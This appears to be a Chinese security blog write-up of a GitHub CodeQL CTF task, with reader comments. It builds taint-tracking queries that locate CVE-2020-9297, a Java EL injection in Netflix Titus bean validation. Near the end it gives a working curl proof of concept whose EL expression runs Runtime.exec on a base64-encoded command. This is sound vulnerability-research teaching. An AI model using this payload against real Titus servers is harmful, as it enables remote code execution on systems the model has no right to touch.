历史记录

    清空历史记录
    • 相关的动态
    • 相关的文章
    • 相关的用户
    • 相关的圈子
    • 相关的话题
    注册 登录
    使用 CodeQL 挖掘 CVE-2020-9297
    syang 漏洞分析 17201浏览 · 2020-07-13 01:47

    前言

    利用 CodeQL 挖掘 CVE-2020-9297 是 Github CTF 中的第四道题目,官方的答案已经公布了 https://securitylab.github.com/ctf/codeql-and-chill/answers, 这里来学习一下解决的思路。

    漏洞描述

    根据官方的描述,可以看到漏洞的成因在于 Netflix Titus 在使用 Java Bean Validation (JSR 380) 的自定义 约束验证的时候,使用了 ConstraintValidatorContext.buildConstraintViolationWithTemplate() 来渲染报错信息,因此如果该函数的参数是用户可控的话,攻击者就能利用构造出的参数触发 Java EL 的执行,进而触发 RCE。

    SchedulingConstraintSetValidator.java 中的这段存在漏洞的代码为例:

    @Override
public boolean isValid(Container container, ConstraintValidatorContext context) {
    if (container == null) {
        return true;
    }
    Set<String> common = new HashSet<>(container.getSoftConstraints().keySet());
    common.retainAll(container.getHardConstraints().keySet());
    if (common.isEmpty()) {
        return true;
    }
    context.buildConstraintViolationWithTemplate(
            "Soft and hard constraints not unique. Shared constraints: " + common
    ).addConstraintViolation().disableDefaultConstraintViolation();
    return false;
}

    可以看到这里 container 是一个用户可控的参数,然后最终从 container 中获得的 common 会在不经过任何处理后就作为参数传给 buildConstraintViolationWithTemplate() 函数。

    利用 CodeQL 进行污点分析

    Source

    很明显 source 是 isValid 函数的第一个参数,因此如何定位 source 就变成了这样一个问题:如何在对所有接口 javax.validation.ConstraintValidator 的实现中,找到 isValid 函数的实现。

    首先先抽象出接口 ConstraintValidator

    class TypeConstraintValidator extends Interface {
    TypeConstraintValidator() {
        this.hasQualifiedName("javax.validation", "ConstraintValidator")
    }

    Method getIsValidMethod() {
        result.getDeclaringType() = this and
        result.hasName("isValid")
    }
}

    其次,因为我们想找的 source 其实是对该接口的具体实现,所以可以利用 overridesOrInstantiates 来具体判断一个函数是否是对该接口的实现:

    class ConstraintValidatorIsValidMethod extends Method {
    ConstraintValidatorIsValidMethod() {
        this.overridesOrInstantiates*(any(TypeConstraintValidator t).getIsValidMethod())
    }
}

    最后可以结合对 source 的具体要求:isValid 函数的第一个参数,通过继承自 DataFlow::Node 可以得到对于 source 的定义(这里用 fromSource 限定了一下来源):

    class BeanValidationSource extends DataFlow::Node {
    BeanValidationSource() {
        exists(ConstraintValidatorIsValidMethod isValidMethod |
            this.asParameter() = isValidMethod.getParameter(0) and 
            isValidMethod.fromSource()
        )
    }
}

    Sink

    类似的,先对 ConstraintValidatorContext.buildConstraintViolationWithTemplate() 函数抽象出相应的定义:

    class TypeConstraintValidatorContext extends RefType {
    TypeConstraintValidatorContext() {
        this.hasQualifiedName("javax.validation", "ConstraintValidatorContext")
    }
}

class BuildConstraintViolationWithTemplateMethod extends Method {
    BuildConstraintViolationWithTemplateMethod() {
        this.getDeclaringType().getASupertype*() instanceof TypeConstraintValidatorContext and
        this.hasName("buildConstraintViolationWithTemplate")
    }
}

    通过对代码的理解我们可以看到,sink 实际就是 buildConstraintViolationWithTemplate 函数的第一个参数,所以我们可以如下定义:

    class TemplateRenderSink extends DataFlow::Node {
    TemplateRenderSink() {
        exists(MethodAccess ma |
            ma.getMethod() instanceof BuildConstraintViolationWithTemplateMethod and
            this.asExpr() = ma.getArgument(0)
        )
    }
}

    第一次测试

    将我们定义的 source 和 sink 结合,定义 TaintConfig 就能开始尝试进行污点分析了:

    /**
 * @kind path-problem
 */

import java
import semmle.code.java.dataflow.TaintTracking
import DataFlow::PathGraph

class TypeConstraintValidator extends Interface {
    TypeConstraintValidator() {
        this.hasQualifiedName("javax.validation", "ConstraintValidator")
    }

    Method getIsValidMethod() {
        result.getDeclaringType() = this and
        result.hasName("isValid")
    }
}

class ConstraintValidatorIsValidMethod extends Method {
    ConstraintValidatorIsValidMethod() {
        this.overridesOrInstantiates*(any(TypeConstraintValidator t).getIsValidMethod())
    }
}

class BeanValidationSource extends DataFlow::Node {
    BeanValidationSource() {
        exists(ConstraintValidatorIsValidMethod isValidMethod |
            this.asParameter() = isValidMethod.getParameter(0) and 
            isValidMethod.fromSource()
        )
    }
}

class TypeConstraintValidatorContext extends RefType {
    TypeConstraintValidatorContext() {
        this.hasQualifiedName("javax.validation", "ConstraintValidatorContext")
    }
}

class BuildConstraintViolationWithTemplateMethod extends Method {
    BuildConstraintViolationWithTemplateMethod() {
        this.getDeclaringType().getASupertype*() instanceof TypeConstraintValidatorContext and
        this.hasName("buildConstraintViolationWithTemplate")
    }
}

class TemplateRenderSink extends DataFlow::Node {
    TemplateRenderSink() {
        exists(MethodAccess ma |
            ma.getMethod() instanceof BuildConstraintViolationWithTemplateMethod and
            this.asExpr() = ma.getArgument(0)
        )
    }
}

class TaintConfig extends TaintTracking::Configuration {
    TaintConfig() { this = "TaintConfig" }

    override predicate isSource(DataFlow::Node source) {
        source instanceof BeanValidationSource
    }

    override predicate isSink(DataFlow::Node sink) {
        sink instanceof TemplateRenderSink
    }

    override int explorationLimit() { result = 4}
}

from TaintConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink, source, sink, "Custom constraint error message contains unsanitized user data"

    结果如图:

    很遗憾完全没看到查询后的结果 (T_T)

    问题分析

    那么现在有必要看一下问题出在哪?

    通过阅读代码,可以看到在 containercommon 之间其实存在着非常多次的函数调用,而如果不对这些调用进行分析的话,势必无法找到从 source 到 sink 间的关键数据流:

    Set<String> common = new HashSet<>(container.getSoftConstraints().keySet());
common.retainAll(container.getHardConstraints().keySet());

    这里我们整理一下需要分析的函数调用:

    1. getSoftConstraints()
    2. keySet()
    3. new HashSet<>()
    4. retainAll()

    我们可以结合 CodeQL 提供的 TaintTracking::AdditionalTaintStep 对这些中间调用进行分析:

    首先是用通配符 get% 匹配 getSoftConstraints 函数:

    class GetterTaintStep extends TaintTracking::AdditionalTaintStep {
    override predicate step(DataFlow::Node n1, DataFlow::Node n2) {
        exists(MethodAccess ma |
            (
                ma.getMethod() instanceof GetterMethod or
                ma.getMethod().getName().matches("get%")
            ) and
            n1.asExpr() = ma.getQualifier() and 
            n2.asExpr() = ma
        )
    }
}

    然后是官方提供的 Maps 库来匹配 keySet 函数:

    import semmle.code.java.Maps

class MapKeySetCall extends MethodAccess {
    MapKeySetCall() {
        this.getMethod().(MapMethod).getName() = "keySet"
    }
}

class KeySetTaintStep extends TaintTracking::AdditionalTaintStep {
    override predicate step(DataFlow::Node n1, DataFlow::Node n2) {
        exists(MapKeySetCall call |
            n1.asExpr() = call.getQualifier() and
            n2.asExpr() = call
        )
    }
}

    下一步是匹配 HashSet 的构造函数,其中上一个节点 n1 需要满足是构造函数的参数:

    class HashSetConstructorCall extends Call {
    HashSetConstructorCall() {
        this.(ConstructorCall).getConstructedType().getSourceDeclaration().hasQualifiedName("java.util", "HashSet")
    }
}

class HashSetTaintStep extends TaintTracking::AdditionalTaintStep {
    override predicate step(DataFlow::Node n1, DataFlow::Node n2) {
        exists(HashSetConstructorCall call |
            n1.asExpr() = call.getAnArgument() and
            n2.asExpr() = call
        )
    }
}

    最后匹配 retainAll 函数,这里同样使用官方提供的 Collections 库:

    import semmle.code.java.Collections

class CollectionRetainAllCall extends MethodAccess {
    CollectionRetainAllCall() {
        this.getMethod().(CollectionMethod).getName() = "retainAll"
    }
}

class CollectionRetainAllTaintStep extends TaintTracking::AdditionalTaintStep {
    override predicate step(DataFlow::Node n1, DataFlow::Node n2) {
        exists(CollectionRetainAllCall ma |
            n1.asExpr() = ma.getAnArgument() and
            n2.asExpr() = ma.getQualifier()
        )
    }
}

    第二次实验

    成功找到了漏洞点:

    漏洞利用

    环境构建

    # 下载源码
git clone https://github.com/Netflix/titus-control-plane
cd titus-control-plane
# 回退到漏洞修复前的 commit
git reset --hard 8a8bd4c
# 启动 docker
docker-compose up -d

    利用

    通过对 SchedulingConstraintSetValidator.java 查询交叉引用 ,可以定位到 titus-control-plane/titus-api/src/main/java/com/netflix/titus/api/jobmanager/model/job/Container.java 文件,然后发现 Container 类会作为 JobDescriptor 内的一个字段存在,而 JobDescriptor 对象可以通过 JobManagementResource 这个类内定义的 api 创建:

    /.../

package com.netflix.titus.runtime.endpoint.v3.rest;

import ...

@Produces(MediaType.APPLICATION_JSON)
@Consumes(MediaType.APPLICATION_JSON)
@Api(tags = "Job Management")
@Path("/v3")
@Singleton
public class JobManagementResource {

    private final JobServiceGateway jobServiceGateway;
    private final SystemLogService systemLog;
    private final CallMetadataResolver callMetadataResolver;

    @Inject
    public JobManagementResource(JobServiceGateway jobServiceGateway,
                                 SystemLogService systemLog,
                                 CallMetadataResolver callMetadataResolver) {
        this.jobServiceGateway = jobServiceGateway;
        this.systemLog = systemLog;
        this.callMetadataResolver = callMetadataResolver;
    }

    @POST
    @ApiOperation("Create a job")
    @Path("/jobs")
    public Response createJob(JobDescriptor jobDescriptor) {
        String jobId = Responses.fromSingleValueObservable(jobServiceGateway.createJob(jobDescriptor, resolveCallMetadata()));
        return Response.status(Response.Status.ACCEPTED).entity(JobId.newBuilder().setId(jobId).build()).build();
    }
    /* 省略其他代码 */
}

    所以漏洞最终的利用逻辑如下:

    1. 通过 POST 请求访问 URL /api/v3/jobs 创建 JobDescriptor 对象
    2. 程序内部由于请求数据而生成的 jobDescriptor.container 会调用 SchedulingConstraintSetValidator.java 类的 isValid 函数进行校验,校验失败,键名作为错误信息通过 buildConstraintViolationWithTemplate(0) 输出
    3. 由于键名是我们构造好的 Java EL 表达式,所以最后该表达式会被执行,进而成功 RCE

    RCE - poc

    curl --location --request POST 'http://127.0.0.1:7001/api/v3/jobs' \
--header 'Content-Type: application/json' \
--data-raw '{
    "applicationName": "localtest",
    "owner": {
        "teamEmail": "me@me.com"
    },
    "container": {
        "image": {
            "name": "alpine",
            "tag": "latest"
        },
        "entryPoint": [
            "/bin/sleep",
            "1h"
        ],
        "securityProfile": {
            "iamRole": "test-role",
            "securityGroups": [
                "sg-test"
            ]
        },
        "softConstraints": {
            "constraints": {
                "#{#this.class.name.substring(0,5) == '\''com.g'\'' ? '\''FOO'\'' : T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('\''dG91Y2ggL3RtcC9wd25lZA=='\''))).class.name}": ""
            }
        },
        "hardConstraints": {
            "constraints": {
                "#{#this.class.name.substring(0,5) == '\''com.g'\'' ? '\''FOO'\'' : T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('\''dG91Y2ggL3RtcC9wd25lZA=='\''))).class.name}": ""
            }
        }
    },
    "batch": {
        "size": 1,
        "runtimeLimitSec": "3600",
        "retryPolicy":{
            "delayed": {
                "delayMs": "1000",
                "retries": 3
            }
        }
    }
}'

    可以看到成功在 docker 内创建了 /tmp/pwned 文件,说明 poc 执行成功。

    参考链接

    1 人收藏 1 人喜欢 转载 分享
    10 条评论
    某人
    表情
    可输入 255
    港城谭咏麟
    2021-01-24 11:46 0 回复

    师傅,CodeQL是真正可以做代码审计的工作,还是说只是可以做做题,在做白盒的过程中没有太大作用呢?


    syang
    2020-07-16 04:33 0 回复

    关于这部分的代码官方也给了,不过我试了一下貌似并不会显示从外部参数到 isValid() 的流向,不知道是不是我姿势还不够(─.─||)(尴尬,重复回复了一条



    module Bonus {
      /**
       * Holds if `isValidMethod` is declared on the constraint validator `validatorType`
       * and is used to validate the field/property `validatedField`,
       * whose value may be obtained from the user-controlled `remoteInput`.
       */
      predicate validatesUserControlledBeanProperty(
        ConstraintValidatorIsValidMethod isValidMethod, Field validatedField, RefType validatorType,
        RemoteFlowSource remoteInput
      ) {
        // This `isValid` method is used to validate a field, or the field's class.
        validatorType = isValidMethod.getDeclaringType() and
        (
          validatedConstraint(validatedField, _, _, validatorType) or
          validatedConstraint(validatedField.getDeclaringType(), _, _, validatorType)
        ) and
        // The value of the field is obtained from user input.
        any(UserInputToValidatedFieldConfig config)
            .hasFlow(remoteInput, DataFlow::exprNode(validatedField.getAnAssignedValue()))
      }

      /** The interface `javax.validation.Constraint`. */
      class TypeConstraint extends Interface {
        TypeConstraint() { this.hasQualifiedName("javax.validation", "Constraint") }
      }

      /** A `@Constraint` annotation. */
      class ConstraintAnnotation extends Annotation {
        ConstraintAnnotation() { this.getType() instanceof TypeConstraint }

        /** Holds if this constraint is validated by the class `validatorType`. */
        predicate isValidatedBy(RefType validatorType) {
          validatorType =
            this.getValue("validatedBy").(ArrayInit).getAnInit().(TypeLiteral).getTypeName().getType()
        }
      }

      /**
       * Holds if `validatedElement` is annotated with a validation constraint defined by `constraintType`,
       * which in turn is annotated with `constraintAnnotation` and validated by `validatorType`.
       */
      predicate validatedConstraint(
        Annotatable validatedElement, RefType constraintType, ConstraintAnnotation constraintAnnotation,
        RefType validatorType
      ) {
        validatedElement.getAnAnnotation().getType() = constraintType and
        constraintType.getAnAnnotation() = constraintAnnotation and
        constraintAnnotation.isValidatedBy(validatorType)
      }

      // This 
      import semmle.code.java.dataflow.TaintTracking2

      /**
       * Taint tracking configuration describing the flow of data
       * from user input to a field.
       * This is used in the bonus part of step 1.1, to detect user-controlled bean properties.
       * 
       * This analysis will be used to compute the sources of the original taint tracking configuration,
       * so we use a second copy of the taint tracking library to avoid compiler warnings due to
       * recursion through a negation.
       */
      class UserInputToValidatedFieldConfig extends TaintTracking2::Configuration {
        UserInputToValidatedFieldConfig() { this = "UserInputToValidatedFieldConfig" }

        override predicate isSource(DataFlow2::Node source) { source instanceof RemoteFlowSource }

        override predicate isSink(DataFlow2::Node sink) {
          sink.asExpr() = any(Field field).getAnAssignedValue()
        }
      }

      /**
       * Tracks the flow of data from a protobuf message to a corresponding Java object,
       * created using a method called `toCore<Name>`.
       * This additional step is used to track from remote input parameters
       * to bean validation of their values.
       */
      class ProtoToCoreTaintStep extends TaintTracking::AdditionalTaintStep {
        override predicate step(DataFlow::Node n1, DataFlow::Node n2) {
          exists(MethodAccess ma |
            ma.getMethod().getName().matches("toCore%") and
            n2.asExpr() = ma and
            n1.asExpr() = ma.getArgument(0)
          )
        }
      }

      /**
       * Tracks the flow of data through utility methods in the class `CollectionsExt`.
       * This additional step is used to track from remote input parameters
       * to bean validation of their values.
       */
      class CollectionsExtTaintStep extends TaintTracking::AdditionalTaintStep {
        override predicate step(DataFlow::Node n1, DataFlow::Node n2) {
          exists(MethodAccess ma |
            ma.getMethod().getName() = ["nullableImmutableCopyOf", "nonNull"] and
            ma.getMethod().getDeclaringType().getName() = "CollectionsExt" and
            n2.asExpr() = ma and
            n1.asExpr() = ma.getArgument(0)
          )
        }
      }
    }

    syang
    2020-07-16 04:30 0 回复

    @threedr3am 嗯嗯,这里确实只是完成了 isValid() 这个函数内的污点分析,但真正可用的漏洞还需要判断这个这个校验器是否被注解到了可控的参数,这部分在官方 Chanllenge 中是作为 Bonus 部分要求的


    syang
    2020-07-16 04:30 0 回复

    @threedr3am 嗯嗯,这里确实只是完成了 isValid() 这个函数内的污点分析,但真正可用的漏洞还需要判断这个这个校验器是否被注解到了可控的参数,这部分在官方 Chanllenge 中是作为 Bonus 部分要求的


    threedr3am
    2020-07-15 11:34 0 回复

    @threedr3am 我理解是这样的,不知道对不对,或者有更好的办法


    threedr3am
    2020-07-15 11:33 0 回复

    这个source从isValid开始就不够全面,一般是使用自定义校验器的时候会实现自己的自定义校验器,这个时候应该先判断isValid 这个source到buildConstraintViolationWithTemplate 这个sink是否可以污点传播,最后接着判断这自定义校验器的注解是否注解在了外部可控的传入点中(比如springmvc的controller参数,即http入参或者body)


    xsser
    2020-07-15 02:17 0 回复

    @syang txsser 多谢大佬


    syang
    2020-07-15 01:47 0 回复

    @xsser 师傅有啥想问的可以给个微信号我加一下,不过我也不保证会,刚入门(─.─||)


    syang
    2020-07-15 00:49 0 回复

    @xsser 转类型类似于再加个限制条件 this.getMethod().getDeclaringType().getSourceDeclaration().hasQualifiedName("java.util", "Map"),第二个就是限定一下方法是在这个类中声明的


    xsser
    2020-07-14 02:15 0 回复

    this.getMethod().(MapMethod).getName() = "keySet"


    this 不是Method access 已经getMethod获得了方法名为啥转类型 然后再getName...


    还有 那个result.getDeclaringType() = this 啥意思。。大佬能加个微信求教几个问题么


      发布投稿
    热门文章
    优秀作者
    目录
    先知社区
    本站/app由 Djingoii 提供技术和产品支持